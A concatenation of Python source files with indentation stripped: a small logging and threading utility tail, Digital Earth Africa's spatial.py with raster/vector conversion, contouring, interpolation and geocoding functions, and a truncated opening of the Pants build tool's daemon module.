if warnhash in warn_once.already:
return
warn_once.already.add(warnhash)
if type(warning) is str:
logger.info(warning + '\n')
elif type(warning) is list:
for line in warning:
logger.info(line + '\n')
warn_once.already = set()
#=========================================#
#| Development stuff (not commonly used) |#
#=========================================#
def concurrent_map(func, data):
"""
Similar to the bultin function map(). But spawn a thread for each argument
and apply `func` concurrently.
Note: unlike map(), we cannot take an iterable argument. `data` should be an
indexable sequence.
"""
N = len(data)
result = [None] * N
# wrapper to dispose the result in the right slot
def task_wrapper(i):
result[i] = func(data[i])
threads = [threading.Thread(target=task_wrapper, args=(i,)) for i in range(N)]
for t in threads:
t.start()
for t in threads:
t.join()
return result |
spatial.py | '''
Spatial analyses functions for Digital Earth Africa data.
'''
# Import required packages
import fiona
import collections
import numpy as np
import xarray as xr
from osgeo import osr
from osgeo import ogr
import geopandas as gpd
import rasterio.features
import scipy.interpolate
import multiprocessing as mp
from scipy import ndimage as nd
from skimage.measure import label
from rasterstats import zonal_stats
from skimage.measure import find_contours
from geopy.geocoders import Nominatim
from shapely.geometry import mapping, shape
from datacube.utils.cog import write_cog
from datacube.helpers import write_geotiff
from datacube.utils.geometry import assign_crs
from datacube.utils.geometry import CRS, Geometry
from shapely.geometry import LineString, MultiLineString, shape
def xr_vectorize(da,
attribute_col='attribute',
transform=None,
crs=None,
dtype='float32',
export_shp=False,
verbose=False,
**rasterio_kwargs):
"""
Vectorises a xarray.DataArray into a geopandas.GeoDataFrame.
Parameters
----------
da : xarray dataarray or a numpy ndarray
attribute_col : str, optional
Name of the attribute column in the resulting geodataframe.
Values of the raster object converted to polygons will be
assigned to this column. Defaults to 'attribute'.
transform : affine.Affine object, optional
An affine.Affine object (e.g. `from affine import Affine;
Affine(30.0, 0.0, 548040.0, 0.0, -30.0, "6886890.0) giving the
affine transformation used to convert raster coordinates
(e.g. [0, 0]) to geographic coordinates. If none is provided,
the function will attempt to obtain an affine transformation
from the xarray object (e.g. either at `da.transform` or
`da.geobox.transform`).
crs : str or CRS object, optional
An EPSG string giving the coordinate system of the array
(e.g. 'EPSG:3577'). If none is provided, the function will
attempt to extract a CRS from the xarray object's `crs`
attribute.
dtype : str, optional
Data type must be one of int16, int32, uint8, uint16,
or float32
export_shp : Boolean or string path, optional
To export the output vectorised features to a shapefile, supply
an output path (e.g. 'output_dir/output.shp'. The default is
False, which will not write out a shapefile.
verbose : bool, optional
Print debugging messages. Default False.
**rasterio_kwargs :
A set of keyword arguments to rasterio.features.shapes
Can include `mask` and `connectivity`.
Returns
-------
gdf : Geopandas GeoDataFrame
"""
# Check for a crs object
try:
crs = da.crs
except:
if crs is None:
raise Exception("Please add a `crs` attribute to the "
"xarray.DataArray, or provide a CRS using the "
"function's `crs` parameter (e.g. 'EPSG:3577')")
# Check if transform is provided as a xarray.DataArray method.
# If not, require supplied Affine
if transform is None:
try:
# First, try to take transform info from geobox
transform = da.geobox.transform
# If no geobox
except:
try:
# Try getting transform from 'transform' attribute
transform = da.transform
except:
# If neither of those options work, raise an exception telling the
# user to provide a transform
raise TypeError("Please provide an Affine transform object using the "
"`transform` parameter (e.g. `from affine import "
"Affine; Affine(30.0, 0.0, 548040.0, 0.0, -30.0, "
"6886890.0)`")
# Check to see if the input is a numpy array
if type(da) is np.ndarray:
vectors = rasterio.features.shapes(source=da.astype(dtype),
transform=transform,
**rasterio_kwargs)
else:
# Run the vectorizing function
vectors = rasterio.features.shapes(source=da.data.astype(dtype),
transform=transform,
**rasterio_kwargs)
# Convert the generator into a list
vectors = list(vectors)
# Extract the polygon coordinates and values from the list
polygons = [polygon for polygon, value in vectors]
values = [value for polygon, value in vectors]
# Convert polygon coordinates into polygon shapes
polygons = [shape(polygon) for polygon in polygons]
# Create a geopandas dataframe populated with the polygon shapes
gdf = gpd.GeoDataFrame(data={attribute_col: values},
geometry=polygons,
crs={'init': str(crs)})
# If a file path is supplied, export a shapefile
if export_shp:
gdf.to_file(export_shp)
return gdf
def xr_rasterize(gdf,
da,
attribute_col=False,
crs=None,
transform=None,
name=None,
x_dim='x',
y_dim='y',
export_tiff=None,
verbose=False,
**rasterio_kwargs):
"""
Rasterizes a geopandas.GeoDataFrame into an xarray.DataArray.
Parameters
----------
gdf : geopandas.GeoDataFrame
A geopandas.GeoDataFrame object containing the vector/shapefile
data you want to rasterise.
da : xarray.DataArray or xarray.Dataset
The shape, coordinates, dimensions, and transform of this object
are used to build the rasterized shapefile. It effectively
provides a template. The attributes of this object are also
appended to the output xarray.DataArray.
attribute_col : string, optional
Name of the attribute column in the geodataframe that the pixels
in the raster will contain. If set to False, output will be a
boolean array of 1's and 0's.
crs : str, optional
CRS metadata to add to the output xarray. e.g. 'epsg:3577'.
The function will attempt get this info from the input
GeoDataFrame first.
transform : affine.Affine object, optional
An affine.Affine object (e.g. `from affine import Affine;
Affine(30.0, 0.0, 548040.0, 0.0, -30.0, "6886890.0) giving the
affine transformation used to convert raster coordinates
(e.g. [0, 0]) to geographic coordinates. If none is provided,
the function will attempt to obtain an affine transformation
from the xarray object (e.g. either at `da.transform` or
`da.geobox.transform`).
x_dim : str, optional
An optional string allowing you to override the xarray dimension
used for x coordinates. Defaults to 'x'. Useful, for example,
if x and y dims instead called 'lat' and 'lon'.
y_dim : str, optional
An optional string allowing you to override the xarray dimension
used for y coordinates. Defaults to 'y'. Useful, for example,
if x and y dims instead called 'lat' and 'lon'.
export_tiff: str, optional
If a filepath is provided (e.g 'output/output.tif'), will export a
geotiff file. A named array is required for this operation, if one
is not supplied by the user a default name, 'data', is used
verbose : bool, optional
Print debugging messages. Default False.
**rasterio_kwargs :
A set of keyword arguments to rasterio.features.rasterize
Can include: 'all_touched', 'merge_alg', 'dtype'.
Returns
-------
xarr : xarray.DataArray
"""
# Check for a crs object
try:
crs = da.geobox.crs
except:
try:
crs = da.crs
except:
if crs is None:
raise ValueError("Please add a `crs` attribute to the "
"xarray.DataArray, or provide a CRS using the "
"function's `crs` parameter (e.g. crs='EPSG:3577')")
# Check if transform is provided as a xarray.DataArray method.
# If not, require supplied Affine
if transform is None:
try:
# First, try to take transform info from geobox
transform = da.geobox.transform
# If no geobox
except:
try:
# Try getting transform from 'transform' attribute
transform = da.transform
except:
# If neither of those options work, raise an exception telling the
# user to provide a transform
raise TypeError("Please provide an Affine transform object using the "
"`transform` parameter (e.g. `from affine import "
"Affine; Affine(30.0, 0.0, 548040.0, 0.0, -30.0, "
"6886890.0)`")
# Grab the 2D dims (not time)
try:
dims = da.geobox.dims
except:
dims = y_dim, x_dim
# Coords
xy_coords = [da[dims[0]], da[dims[1]]]
# Shape
try:
y, x = da.geobox.shape
except:
y, x = len(xy_coords[0]), len(xy_coords[1])
# Reproject shapefile to match CRS of raster
if verbose:
print(f'Rasterizing to match xarray.DataArray dimensions ({y}, {x})')
try:
gdf_reproj = gdf.to_crs(crs=crs)
except:
# Sometimes the crs can be a datacube utils CRS object
# so convert to string before reprojecting
gdf_reproj = gdf.to_crs(crs={'init': str(crs)})
# If an attribute column is specified, rasterise using vector
# attribute values. Otherwise, rasterise into a boolean array
if attribute_col:
# Use the geometry and attributes from `gdf` to create an iterable
shapes = zip(gdf_reproj.geometry, gdf_reproj[attribute_col])
else:
# Use geometry directly (will produce a boolean numpy array)
shapes = gdf_reproj.geometry
# Rasterise shapes into an array
arr = rasterio.features.rasterize(shapes=shapes,
out_shape=(y, x),
transform=transform,
**rasterio_kwargs)
# Convert result to a xarray.DataArray
xarr = xr.DataArray(arr,
coords=xy_coords,
dims=dims,
attrs=da.attrs,
name=name if name else None)
# Add back crs if xarr.attrs doesn't have it
if xarr.geobox is None:
xarr = assign_crs(xarr, str(crs))
if export_tiff:
if verbose:
print(f"Exporting GeoTIFF to {export_tiff}")
write_cog(xarr,
export_tiff,
overwrite=True)
return xarr
def subpixel_contours(da,
z_values=[0.0],
crs=None,
affine=None,
attribute_df=None,
output_path=None,
min_vertices=2,
dim='time',
errors='ignore',
verbose=False):
"""
Uses `skimage.measure.find_contours` to extract multiple z-value
contour lines from a two-dimensional array (e.g. multiple elevations
from a single DEM), or one z-value for each array along a specified
dimension of a multi-dimensional array (e.g. to map waterlines
across time by extracting a 0 NDWI contour from each individual
timestep in an xarray timeseries).
Contours are returned as a geopandas.GeoDataFrame with one row per
z-value or one row per array along a specified dimension. The
`attribute_df` parameter can be used to pass custom attributes
to the output contour features.
Last modified: November 2020
Parameters
----------
da : xarray DataArray
A two-dimensional or multi-dimensional array from which
contours are extracted. If a two-dimensional array is provided,
the analysis will run in 'single array, multiple z-values' mode
which allows you to specify multiple `z_values` to be extracted.
If a multi-dimensional array is provided, the analysis will run
in 'single z-value, multiple arrays' mode allowing you to
extract contours for each array along the dimension specified
by the `dim` parameter.
z_values : int, float or list of ints, floats
An individual z-value or list of multiple z-values to extract
from the array. If operating in 'single z-value, multiple
arrays' mode specify only a single z-value.
crs : string or CRS object, optional
An EPSG string giving the coordinate system of the array
(e.g. 'EPSG:3577'). If none is provided, the function will
attempt to extract a CRS from the xarray object's `crs`
attribute.
affine : affine.Affine object, optional
An affine.Affine object (e.g. `from affine import Affine;
Affine(30.0, 0.0, 548040.0, 0.0, -30.0, "6886890.0) giving the
affine transformation used to convert raster coordinates
(e.g. [0, 0]) to geographic coordinates. If none is provided,
the function will attempt to obtain an affine transformation
from the xarray object (e.g. either at `da.transform` or
`da.geobox.transform`).
output_path : string, optional
The path and filename for the output shapefile.
attribute_df : pandas.Dataframe, optional
A pandas.Dataframe containing attributes to pass to the output
contour features. The dataframe must contain either the same
number of rows as supplied `z_values` (in 'multiple z-value,
single array' mode), or the same number of rows as the number
of arrays along the `dim` dimension ('single z-value, multiple
arrays mode').
min_vertices : int, optional
The minimum number of vertices required for a contour to be
extracted. The default (and minimum) value is 2, which is the
smallest number required to produce a contour line (i.e. a start
and end point). Higher values remove smaller contours,
potentially removing noise from the output dataset.
dim : string, optional
The name of the dimension along which to extract contours when
operating in 'single z-value, multiple arrays' mode. The default
is 'time', which extracts contours for each array along the time
dimension.
errors : string, optional
If 'raise', then any failed contours will raise an exception.
If 'ignore' (the default), a list of failed contours will be
printed. If no contours are returned, an exception will always
be raised.
verbose : bool, optional
Print debugging messages. Default False.
Returns
-------
output_gdf : geopandas geodataframe
A geopandas geodataframe object with one feature per z-value
('single array, multiple z-values' mode), or one row per array
along the dimension specified by the `dim` parameter ('single
z-value, multiple arrays' mode). If `attribute_df` was
provided, these values will be included in the shapefile's
attribute table.
"""
def contours_to_multiline(da_i, z_value, min_vertices=2):
'''
Helper function to apply marching squares contour extraction
to an array and return a data as a shapely MultiLineString.
The `min_vertices` parameter allows you to drop small contours
with less than X vertices.
'''
# Extracts contours from array, and converts each discrete
# contour into a Shapely LineString feature. If the function
# returns a KeyError, this may be due to an unresolved issue in
# scikit-image: https://github.com/scikit-image/scikit-image/issues/4830
line_features = [LineString(i[:,[1, 0]])
for i in find_contours(da_i.data, z_value)
if i.shape[0] > min_vertices]
# Output resulting lines into a single combined MultiLineString
return MultiLineString(line_features)
# Check if CRS is provided as a xarray.DataArray attribute.
# If not, require supplied CRS
try:
crs = da.crs
except:
if crs is None:
raise ValueError("Please add a `crs` attribute to the "
"xarray.DataArray, or provide a CRS using the "
"function's `crs` parameter (e.g. 'EPSG:3577')")
# Check if Affine transform is provided as a xarray.DataArray method.
# If not, require supplied Affine
try:
affine = da.geobox.transform
except KeyError:
affine = da.transform
except:
if affine is None:
raise TypeError("Please provide an Affine object using the "
"`affine` parameter (e.g. `from affine import "
"Affine; Affine(30.0, 0.0, 548040.0, 0.0, -30.0, "
"6886890.0)`")
# If z_values is supplied is not a list, convert to list:
z_values = z_values if (isinstance(z_values, list) or
isinstance(z_values, np.ndarray)) else [z_values]
# Test number of dimensions in supplied data array
if len(da.shape) == 2:
if verbose:
print(f'Operating in multiple z-value, single array mode')
dim = 'z_value'
contour_arrays = {str(i)[0:10]:
contours_to_multiline(da, i, min_vertices)
for i in z_values}
else:
# Test if only a single z-value is given when operating in
# single z-value, multiple arrays mode
if verbose:
print(f'Operating in single z-value, multiple arrays mode')
if len(z_values) > 1:
raise ValueError('Please provide a single z-value when operating '
'in single z-value, multiple arrays mode')
contour_arrays = {str(i)[0:10]:
contours_to_multiline(da_i, z_values[0], min_vertices)
for i, da_i in da.groupby(dim)}
# If attributes are provided, add the contour keys to that dataframe
if attribute_df is not None:
try:
attribute_df.insert(0, dim, contour_arrays.keys())
except ValueError:
raise ValueError("One of the following issues occured:\n\n"
"1) `attribute_df` contains a different number of "
"rows than the number of supplied `z_values` ("
"'multiple z-value, single array mode')\n"
"2) `attribute_df` contains a different number of "
"rows than the number of arrays along the `dim` "
"dimension ('single z-value, multiple arrays mode')")
# Otherwise, use the contour keys as the only main attributes
else:
attribute_df = list(contour_arrays.keys())
# Convert output contours to a geopandas.GeoDataFrame
contours_gdf = gpd.GeoDataFrame(data=attribute_df,
geometry=list(contour_arrays.values()),
crs=crs)
# Define affine and use to convert array coords to geographic coords.
# We need to add 0.5 x pixel size to the x and y to obtain the centre
# point of our pixels, rather than the top-left corner
shapely_affine = [affine.a, affine.b, affine.d, affine.e,
affine.xoff + affine.a / 2.0,
affine.yoff + affine.e / 2.0]
contours_gdf['geometry'] = contours_gdf.affine_transform(shapely_affine)
# Rename the data column to match the dimension
contours_gdf = contours_gdf.rename({0: dim}, axis=1)
# Drop empty timesteps
empty_contours = contours_gdf.geometry.is_empty
failed = ', '.join(map(str, contours_gdf[empty_contours][dim].to_list()))
contours_gdf = contours_gdf[~empty_contours]
# Raise exception if no data is returned, or if any contours fail
# when `errors='raise'. Otherwise, print failed contours
if empty_contours.all() and errors == 'raise':
raise RuntimeError("Failed to generate any valid contours; verify that "
"values passed to `z_values` are valid and present "
"in `da`")
elif empty_contours.all() and errors == 'ignore':
if verbose:
print ("Failed to generate any valid contours; verify that "
"values passed to `z_values` are valid and present "
"in `da`")
elif empty_contours.any() and errors == 'raise':
raise Exception(f'Failed to generate contours: {failed}')
elif empty_contours.any() and errors == 'ignore':
if verbose:
print(f'Failed to generate contours: {failed}')
# If asked to write out file, test if geojson or shapefile
if output_path and output_path.endswith('.geojson'):
if verbose:
print(f'Writing contours to {output_path}')
contours_gdf.to_crs('EPSG:4326').to_file(filename=output_path,
driver='GeoJSON')
if output_path and output_path.endswith('.shp'):
if verbose:
print(f'Writing contours to {output_path}')
contours_gdf.to_file(filename=output_path)
return contours_gdf
def interpolate_2d(ds,
x_coords,
y_coords,
z_coords,
method='linear',
factor=1,
verbose=False,
**kwargs):
"""
This function takes points with X, Y and Z coordinates, and
interpolates Z-values across the extent of an existing xarray
dataset. This can be useful for producing smooth surfaces from point
data that can be compared directly against satellite data derived
from an OpenDataCube query.
Supported interpolation methods include 'linear', 'nearest' and
'cubic (using `scipy.interpolate.griddata`), and 'rbf' (using
`scipy.interpolate.Rbf`).
Last modified: February 2020
Parameters
----------
ds : xarray DataArray or Dataset
A two-dimensional or multi-dimensional array from which x and y
dimensions will be copied and used for the area in which to
interpolate point data.
x_coords, y_coords : numpy array
Arrays containing X and Y coordinates for all points (e.g.
longitudes and latitudes).
z_coords : numpy array
An array containing Z coordinates for all points (e.g.
elevations). These are the values you wish to interpolate
between.
method : string, optional
The method used to interpolate between point values. This string
is either passed to `scipy.interpolate.griddata` (for 'linear',
'nearest' and 'cubic' methods), or used to specify Radial Basis
Function interpolation using `scipy.interpolate.Rbf` ('rbf').
Defaults to 'linear'.
factor : int, optional
An optional integer that can be used to subsample the spatial
interpolation extent to obtain faster interpolation times, then
up-sample this array back to the original dimensions of the
data as a final step. For example, setting `factor=10` will
interpolate data into a grid that has one tenth of the
resolution of `ds`. This approach will be significantly faster
than interpolating at full resolution, but will potentially
produce less accurate or reliable results.
verbose : bool, optional
Print debugging messages. Default False.
**kwargs :
Optional keyword arguments to pass to either
`scipy.interpolate.griddata` (if `method` is 'linear', 'nearest'
or 'cubic'), or `scipy.interpolate.Rbf` (is `method` is 'rbf').
Returns
-------
interp_2d_array : xarray DataArray
An xarray DataArray containing with x and y coordinates copied
from `ds_array`, and Z-values interpolated from the points data.
"""
# Extract xy and elev points
points_xy = np.vstack([x_coords, y_coords]).T
# Extract x and y coordinates to interpolate into.
# If `factor` is greater than 1, the coordinates will be subsampled
# for faster run-times. If the last x or y value in the subsampled
# grid aren't the same as the last x or y values in the original
# full resolution grid, add the final full resolution grid value to
# ensure data is interpolated up to the very edge of the array
if ds.x[::factor][-1].item() == ds.x[-1].item():
x_grid_coords = ds.x[::factor].values
else:
x_grid_coords = ds.x[::factor].values.tolist() + [ds.x[-1].item()]
if ds.y[::factor][-1].item() == ds.y[-1].item():
y_grid_coords = ds.y[::factor].values
else:
y_grid_coords = ds.y[::factor].values.tolist() + [ds.y[-1].item()]
# Create grid to interpolate into
grid_y, grid_x = np.meshgrid(x_grid_coords, y_grid_coords)
# Apply scipy.interpolate.griddata interpolation methods
if method in ('linear', 'nearest', 'cubic'):
# Interpolate x, y and z values
interp_2d = scipy.interpolate.griddata(points=points_xy,
values=z_coords,
xi=(grid_y, grid_x),
method=method,
**kwargs)
# Apply Radial Basis Function interpolation
elif method == 'rbf':
# Interpolate x, y and z values
rbf = scipy.interpolate.Rbf(x_coords, y_coords, z_coords, **kwargs)
interp_2d = rbf(grid_y, grid_x)
# Create xarray dataarray from the data and resample to ds coords
interp_2d_da = xr.DataArray(interp_2d,
coords=[y_grid_coords, x_grid_coords],
dims=['y', 'x'])
# If factor is greater than 1, resample the interpolated array to
# match the input `ds` array
if factor > 1:
interp_2d_da = interp_2d_da.interp_like(ds)
return interp_2d_da
def contours_to_arrays(gdf, col):
"""
This function converts a polyline shapefile into an array with three
columns giving the X, Y and Z coordinates of each vertex. This data
can then be used as an input to interpolation procedures (e.g. using
a function like `interpolate_2d`.
Last modified: October 2019
Parameters
----------
gdf : Geopandas GeoDataFrame
A GeoPandas GeoDataFrame of lines to convert into point
coordinates.
col : str
A string giving the name of the GeoDataFrame field to use as
Z-values.
Returns
-------
A numpy array with three columns giving the X, Y and Z coordinates
of each vertex in the input GeoDataFrame.
"""
coords_zvals = []
for i in range(0, len(gdf)):
val = gdf.iloc[i][col]
try:
coords = np.concatenate([np.vstack(x.coords.xy).T
for x in gdf.iloc[i].geometry])
except:
coords = np.vstack(gdf.iloc[i].geometry.coords.xy).T
coords_zvals.append(np.column_stack((coords,
np.full(np.shape(coords)[0],
fill_value=val))))
return np.concatenate(coords_zvals)
def largest_region(bool_array, **kwargs):
'''
Takes a boolean array and identifies the largest contiguous region of
connected True values. This is returned as a new array with cells in
the largest region marked as True, and all other cells marked as False.
Parameters
----------
bool_array : boolean array
A boolean array (numpy or xarray.DataArray) with True values for
the areas that will be inspected to find the largest group of
connected cells
**kwargs :
Optional keyword arguments to pass to `measure.label`
Returns
-------
largest_region : boolean array
A boolean array with cells in the largest region marked as True,
and all other cells marked as False.
'''
# First, break boolean array into unique, discrete regions/blobs
blobs_labels = label(bool_array, background=0, **kwargs)
# Count the size of each blob, excluding the background class (0)
ids, counts = np.unique(blobs_labels[blobs_labels > 0],
return_counts=True)
# Identify the region ID of the largest blob
largest_region_id = ids[np.argmax(counts)]
# Produce a boolean array where 1 == the largest region
largest_region = blobs_labels == largest_region_id
return largest_region
def transform_geojson_wgs_to_epsg(geojson, EPSG):
"""
Takes a geojson dictionary and converts it from WGS84 (EPSG:4326) to desired EPSG
Parameters
----------
geojson: dict
a geojson dictionary containing a 'geometry' key, in WGS84 coordinates
EPSG: int
numeric code for the EPSG coordinate referecnce system to transform into
Returns
-------
transformed_geojson: dict
a geojson dictionary containing a 'coordinates' key, in the desired CRS
"""
gg = Geometry(geojson['geometry'], CRS('epsg:4326'))
gg = gg.to_crs(CRS(f'epsg:{EPSG}'))
return gg.__geo_interface__
def zonal_stats_parallel(shp,
raster,
statistics,
out_shp,
ncpus,
**kwargs):
"""
Summarizing raster datasets based on vector geometries in parallel.
Each cpu recieves an equal chunk of the dataset.
Utilizes the perrygeo/rasterstats package.
Parameters
----------
shp : str
Path to shapefile that contains polygons over
which zonal statistics are calculated
raster: str
Path to the raster from which the statistics are calculated.
This can be a virtual raster (.vrt).
statistics: list
list of statistics to calculate. e.g.
['min', 'max', 'median', 'majority', 'sum']
out_shp: str
Path to export shapefile containing zonal statistics.
ncpus: int
number of cores to parallelize the operations over.
kwargs:
Any other keyword arguments to rasterstats.zonal_stats()
See https://github.com/perrygeo/python-rasterstats for
all options
Returns
-------
Exports a shapefile to disk containing the zonal statistics requested
"""
#yields n sized chunks from list l (used for splitting task to multiple processes)
def chunks(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
#calculates zonal stats and adds results to a dictionary
def worker(z,raster,d):
z_stats = zonal_stats(z,raster,stats=statistics,**kwargs)
for i in range(0,len(z_stats)):
d[z[i]['id']]=z_stats[i]
#write output polygon
def write_output(zones, out_shp,d):
#copy schema and crs from input and add new fields for each statistic
schema = zones.schema.copy()
crs = zones.crs
for stat in statistics:
schema['properties'][stat] = 'float'
with fiona.open(out_shp, 'w', 'ESRI Shapefile', schema, crs) as output:
for elem in zones:
for stat in statistics:
elem['properties'][stat]=d[elem['id']][stat]
output.write({'properties':elem['properties'],'geometry': mapping(shape(elem['geometry']))})
with fiona.open(shp) as zones:
jobs = []
# create manager dictionary (polygon ids=keys, stats=entries)
# where multiple processes can write without conflicts
man = mp.Manager()
d = man.dict()
#split zone polygons into 'ncpus' chunks for parallel processing
# and call worker() for each
split = chunks(zones, len(zones)//ncpus)
for z in split:
p = mp.Process(target=worker,args=(z, raster,d))
p.start()
jobs.append(p)
#wait that all chunks are finished
[j.join() for j in jobs]
write_output(zones,out_shp,d)
def reverse_geocode(coords, site_classes=None, state_classes=None):
"""
Takes a latitude and longitude coordinate, and performs a reverse
geocode to return a plain-text description of the location in the
form:
Site, State
E.g.: `reverse_geocode(coords=(-35.282163, 149.128835))`
'Canberra, Australian Capital Territory'
Parameters
----------
coords : tuple of floats
A tuple of (latitude, longitude) coordinates used to perform
the reverse geocode.
site_classes : list of strings, optional
A list of strings used to define the site part of the plain
text location description. Because the contents of the geocoded
address can vary greatly depending on location, these strings
are tested against the address one by one until a match is made.
Defaults to:
``['city', 'town', 'village', 'suburb', 'hamlet', 'county', 'municipality']``
state_classes : list of strings, optional
A list of strings used to define the state part of the plain
text location description. These strings are tested against the
address one by one until a match is made. Defaults to:
`['state', 'territory']`.
Returns
-------
If a valid geocoded address is found, a plain text location
description will be returned:
'Site, State'
If no valid address is found, formatted coordinates will be returned
instead:
'XX.XX S, XX.XX E'
"""
# Run reverse geocode using coordinates
geocoder = Nominatim(user_agent='Digital Earth Africa')
out = geocoder.reverse(coords)
# Create plain text-coords as fall-back
lat = f'{-coords[0]:.2f} S' if coords[0] < 0 else f'{coords[0]:.2f} N'
lon = f'{-coords[1]:.2f} W' if coords[1] < 0 else f'{coords[1]:.2f} E'
try:
# Get address from geocoded data
address = out.raw['address']
# Use site and state classes if supplied; else use defaults
default_site_classes = ['city', 'town', 'village', 'suburb', 'hamlet',
'county', 'municipality']
default_state_classes = ['state', 'territory']
site_classes = site_classes if site_classes else default_site_classes
state_classes = state_classes if state_classes else default_state_classes
# Return the first site or state class that exists in address dict
site = next((address[k] for k in site_classes if k in address), None)
state = next((address[k] for k in state_classes if k in address), None)
# If site and state exist in the data, return this.
# Otherwise, return N/E/S/W coordinates.
if site and state:
# Return as site, state formatted string
return f'{site}, {state}'
else:
# If no geocoding result, return N/E/S/W coordinates
print('No valid geocoded location; returning coordinates instead')
return f'{lat}, {lon}'
except (KeyError, AttributeError):
# If no geocoding result, return N/E/S/W coordinates
print('No valid geocoded location; returning coordinates instead')
return f'{lat}, {lon}' |
pants_daemon.py | # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import logging
import os
import sys
import threading
from contextlib import contextmanager
from dataclasses import dataclass
from setproctitle import setproctitle as set_process_title
from pants.base.build_environment import get_buildroot
from pants.base.exception_sink import ExceptionSink, SignalHandler
from pants.base.exiter import Exiter
from pants.bin.daemon_pants_runner import DaemonPantsRunner
from pants.engine.native import Native
from pants.init.engine_initializer import EngineInitializer
from pants.init.logging import init_rust_logger, setup_logging
from pants.init.options_initializer import BuildConfigInitializer, OptionsInitializer
from pants.option.arg_splitter import GLOBAL_SCOPE
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.option.options_fingerprinter import OptionsFingerprinter
from pants.pantsd.process_manager import FingerprintedProcessManager
from pants.pantsd.service.fs_event_service import FSEventService
from pants.pantsd.service.pailgun_service import PailgunService
from pants.pantsd.service.pants_service import PantsServices
from pants.pantsd.service.scheduler_service import SchedulerService
from pants.pantsd.service.store_gc_service import StoreGCService
from pants.pantsd.watchman_launcher import WatchmanLauncher
from pants.util.contextutil import stdio_as
from pants.util.memo import memoized_property
from pants.util.strutil import ensure_text
class _LoggerStream(object):
"""A sys.std{out,err} replacement that pipes output to a logger.
N.B. `logging.Logger` expects unicode. However, most of our outstream logic, such as in `exiter.py`,
will use `sys.std{out,err}.buffer` and thus a bytes interface. So, we must provide a `buffer`
property, and change the semantics of the buffer to always convert the message to unicode. This
is an unfortunate code smell, as `logging` does not expose a bytes interface so this is
the best solution we could think of.
"""
def __init__(self, logger, log_level, handler):
"""
:param logging.Logger logger: The logger instance to emit writes to.
:param int log_level: The log level to use for the given logger.
:param Handler handler: The underlying log handler, for determining the fileno
to support faulthandler logging.
"""
self._logger = logger
self._log_level = log_level
self._handler = handler
def write(self, msg):
msg = ensure_text(msg)
for line in msg.rstrip().splitlines():
# The log only accepts text, and will raise a decoding error if the default encoding is ascii
# if provided a bytes input for unicode text.
line = ensure_text(line)
self._logger.log(self._log_level, line.rstrip())
def flush(self):
return
def isatty(self):
return False
def fileno(self):
return self._handler.stream.fileno()
@property
def buffer(self):
return self
class PantsDaemonSignalHandler(SignalHandler):
def __init__(self, daemon):
super().__init__()
self._daemon = daemon
def handle_sigint(self, signum, _frame):
self._daemon.terminate(include_watchman=False)
class PantsDaemon(FingerprintedProcessManager):
"""A daemon that manages PantsService instances."""
JOIN_TIMEOUT_SECONDS = 1
LOG_NAME = 'pantsd.log'
class StartupFailure(Exception):
"""Represents a failure to start pantsd."""
class RuntimeFailure(Exception):
"""Represents a pantsd failure at runtime, usually from an underlying service failure."""
@dataclass(frozen=True)
class Handle:
"""A handle to a "probably running" pantsd instance.
We attempt to verify that the pantsd instance is still running when we create a Handle, but
after it has been created it is entirely process that the pantsd instance perishes.
"""
pid: int
port: int
metadata_base_dir: str
class Factory:
@classmethod
def maybe_launch(cls, options_bootstrapper):
"""Creates and launches a daemon instance if one does not already exist.
:param OptionsBootstrapper options_bootstrapper: The bootstrap options.
:returns: A Handle for the running pantsd instance.
:rtype: PantsDaemon.Handle
"""
stub_pantsd = cls.create(options_bootstrapper, full_init=False)
with stub_pantsd._services.lifecycle_lock:
if stub_pantsd.needs_restart(stub_pantsd.options_fingerprint):
# Once we determine we actually need to launch, recreate with full initialization.
pantsd = cls.create(options_bootstrapper)
return pantsd.launch()
else:
# We're already launched.
return PantsDaemon.Handle(
stub_pantsd.await_pid(10),
stub_pantsd.read_named_socket('pailgun', int),
stub_pantsd._metadata_base_dir,
)
@classmethod
def restart(cls, options_bootstrapper):
"""Restarts a running daemon instance.
:param OptionsBootstrapper options_bootstrapper: The bootstrap options.
:returns: A Handle for the pantsd instance.
:rtype: PantsDaemon.Handle
"""
pantsd = cls.create(options_bootstrapper)
with pantsd._services.lifecycle_lock:
# N.B. This will call `pantsd.terminate()` before starting.
return pantsd.launch()
@classmethod
def create(cls, options_bootstrapper, full_init=True):
"""
:param OptionsBootstrapper options_bootstrapper: The bootstrap options.
:param bool full_init: Whether or not to fully initialize an engine et al for the purposes
of spawning a new daemon. `full_init=False` is intended primarily
for lightweight lifecycle checks (since there is a ~1s overhead to
initialize the engine). See the impl of `maybe_launch` for an example
of the intended usage.
"""
bootstrap_options = options_bootstrapper.bootstrap_options
bootstrap_options_values = bootstrap_options.for_global_scope()
# TODO: https://github.com/pantsbuild/pants/issues/3479
watchman = WatchmanLauncher.create(bootstrap_options_values).watchman
if full_init:
build_root = get_buildroot()
native = Native()
build_config = BuildConfigInitializer.get(options_bootstrapper)
legacy_graph_scheduler = EngineInitializer.setup_legacy_graph(native,
options_bootstrapper,
build_config)
services = cls._setup_services(
build_root,
bootstrap_options_values,
legacy_graph_scheduler,
watchman
)
else:
build_root = None
native = None
services = PantsServices()
return PantsDaemon(
native=native,
build_root=build_root,
work_dir=bootstrap_options_values.pants_workdir,
log_level=bootstrap_options_values.level.upper(),
services=services,
metadata_base_dir=bootstrap_options_values.pants_subprocessdir,
bootstrap_options=bootstrap_options
)
@staticmethod
def _setup_services(build_root, bootstrap_options, legacy_graph_scheduler, watchman):
"""Initialize pantsd services.
:returns: A PantsServices instance.
"""
should_shutdown_after_run = bootstrap_options.shutdown_pantsd_after_run
fs_event_service = FSEventService(
watchman,
build_root,
)
pidfile_absolute = PantsDaemon.metadata_file_path('pantsd', 'pid', bootstrap_options.pants_subprocessdir)
if pidfile_absolute.startswith(build_root):
pidfile = os.path.relpath(pidfile_absolute, build_root)
else:
pidfile = None
logging.getLogger(__name__).warning(
'Not watching pantsd pidfile because subprocessdir is outside of buildroot. Having '
'subprocessdir be a child of buildroot (as it is by default) may help avoid stray '
'pantsd processes.'
)
scheduler_service = SchedulerService(
fs_event_service,
legacy_graph_scheduler,
build_root,
OptionsInitializer.compute_pantsd_invalidation_globs(build_root, bootstrap_options),
pidfile,
)
pailgun_service = PailgunService(
(bootstrap_options.pantsd_pailgun_host, bootstrap_options.pantsd_pailgun_port),
DaemonPantsRunner,
scheduler_service,
should_shutdown_after_run,
)
